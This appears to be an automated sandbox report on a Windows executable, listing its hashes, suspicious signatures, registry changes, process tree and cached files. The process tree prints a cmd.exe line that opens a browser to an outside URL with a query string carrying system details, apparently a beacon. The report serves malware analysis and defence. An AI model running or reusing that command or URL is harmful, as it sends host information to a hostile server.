Analysis
-
max time kernel
222s -
max time network
310s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
27/11/2022, 15:01
Static task
static1
Behavioral task
behavioral1
Sample
966fe894f93e9d57ad9ed974d8a35cbc04ce610bd36316ca7d6a919db18fb000.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
966fe894f93e9d57ad9ed974d8a35cbc04ce610bd36316ca7d6a919db18fb000.exe
Resource
win10v2004-20221111-en
General
-
Target
966fe894f93e9d57ad9ed974d8a35cbc04ce610bd36316ca7d6a919db18fb000.exe
-
Size
143KB
-
MD5
bb5827a533cc2a945e90a024317a4431
-
SHA1
d4e6fbd96a3cb2a1146f0c0b348de308245837d3
-
SHA256
966fe894f93e9d57ad9ed974d8a35cbc04ce610bd36316ca7d6a919db18fb000
-
SHA512
e04a2f6ac637fd9db8968c74132b02be912413d61cb607bd3169ac81f2929611423364e363e20576a21974e348f876f2bc2a61567213cb07419325ea52c6ec6c
-
SSDEEP
3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45D6w:pe9IB83ID5ew
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D84E18C1-6F24-11ED-B964-E233F62F3A57} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 556 966fe894f93e9d57ad9ed974d8a35cbc04ce610bd36316ca7d6a919db18fb000.exe 1140 iexplore.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 556 966fe894f93e9d57ad9ed974d8a35cbc04ce610bd36316ca7d6a919db18fb000.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1140 iexplore.exe 1140 iexplore.exe 952 IEXPLORE.EXE 952 IEXPLORE.EXE 952 IEXPLORE.EXE 952 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 556 wrote to memory of 1652 556 966fe894f93e9d57ad9ed974d8a35cbc04ce610bd36316ca7d6a919db18fb000.exe 31 PID 556 wrote to memory of 1652 556 966fe894f93e9d57ad9ed974d8a35cbc04ce610bd36316ca7d6a919db18fb000.exe 31 PID 556 wrote to memory of 1652 556 966fe894f93e9d57ad9ed974d8a35cbc04ce610bd36316ca7d6a919db18fb000.exe 31 PID 556 wrote to memory of 1652 556 966fe894f93e9d57ad9ed974d8a35cbc04ce610bd36316ca7d6a919db18fb000.exe 31 PID 1652 wrote to memory of 1140 1652 cmd.exe 33 PID 1652 wrote to memory of 1140 1652 cmd.exe 33 PID 1652 wrote to memory of 1140 1652 cmd.exe 33 PID 1652 wrote to memory of 1140 1652 cmd.exe 33 PID 1140 wrote to memory of 952 1140 iexplore.exe 34 PID 1140 wrote to memory of 952 1140 iexplore.exe 34 PID 1140 wrote to memory of 952 1140 iexplore.exe 34 PID 1140 wrote to memory of 952 1140 iexplore.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\966fe894f93e9d57ad9ed974d8a35cbc04ce610bd36316ca7d6a919db18fb000.exe"C:\Users\Admin\AppData\Local\Temp\966fe894f93e9d57ad9ed974d8a35cbc04ce610bd36316ca7d6a919db18fb000.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=5304457^&rsn=plde^&details=^|v6.1.7601x64sp1.0ws^|tt39^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"2⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://securedfileinfo.com/404.jsp?chid=5304457&rsn=plde&details=|v6.1.7601x64sp1.0ws|tt39|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p13⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:952
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD57ef66f502cb164d6d88fd779895d5e07
SHA175c68e887afe0041c18bc01dc36ae719db07a436
SHA256084f8949af79ac48c5c245e4bbeea807949d1e8e182e7d0487227231fcd97a77
SHA512419b6e5def7e1051af856ea4256235fa4f1bdbf001b54f1db9e59c44f7da8f9cfa8d63f77e35345ec6d5c3ab13de10094281d44f42a7e1fd9d92b3b68ac5ba9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize472B
MD503ad9fc0b00b5df3165dc2fb1e3b0a3e
SHA1f8243335a8bc24d989bddd346048a055e1d0bdeb
SHA256366b28d491f7fd632e31c1ce97f939555f7dcee14bb6875737ed2d3e96fa32ec
SHA512a3cd8a001366e6c1b96d2b920d56e6efd34e9b69b9805e1a2b0c270346712e22420366f8bd18bbb1dd16fa60d481ad65b13385a66a3f1fa0d7aadaaa27b99796
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize724B
MD5f569e1d183b84e8078dc456192127536
SHA130c537463eed902925300dd07a87d820a713753f
SHA256287bc80237497eb8681dbf136a56cc3870dd5bd12d48051525a280ae62aab413
SHA51249553b65a8e3fc0bf98c1bc02bae5b22188618d8edf8e88e4e25932105796956ae8301c63c487e0afe368ea39a4a2af07935a808f5fb53287ef9287bc73e1012
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD56e46341754feedbbdaaadd0d16987d1c
SHA19e804b622665d53d8f3ed7f8a6001718aad0d762
SHA2568c7a52d87527379a2954af93e780c21c446a03ac8e19304e77d178691ea8439f
SHA5123dc5b2a6d029c0d8d3db848c28727e8feeb8d162a8b2806b658fa81fb9df99e962ea9582c051dd02dc15495d7c5bf44a786b09986475ed7206b11f588f0d74d2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize402B
MD503217e5ae787ce4e8d5641e72e2e6d5e
SHA1b1d661454845df8cf70b8c3de7d25d60cce4d802
SHA256f1a916adf8a9d723634ab0ac4a93db67d6440f6d143bff7064c6bb214cc31872
SHA5125d4695757daba1bc282a09bf878665ea184dff347911cb5488a201a6f9835df24fe7a5e847491762666c604de687d283e8cb43ad6ec8f69cb6c3e6b6df2cf82d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5b1040e27e286da40bbe9fface819650c
SHA10ea3ba3c7f86467008228a6fc8f18f083b8369da
SHA256dfcc249f3e748fa07ffe50063e214b13aceefb23383e250928aff75354037569
SHA512358c916d20e8b04622c718b6b8c0848ddd5555869dfe72ec67147a0640e101cae2c80b38bbf98ae99efb9c221e4fb11c17d938381586401c25f187ab04147d30
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize392B
MD5413f2d20c40572fee4e17160045ddfa8
SHA1a8638084335368d70494cf42b682ff520413dd66
SHA2561b39d0a1daab117c4469c6563d1b52a423fb7083c8baca263993afc3cc8abac0
SHA512f21e0dd6a45e6f34678fa33442ab733600a3f9fecbe1b39828cf7ef79297a8810e78c9175469ff216f984fa5f69657f0e70a94fe761bdf42e82d708ac67c228e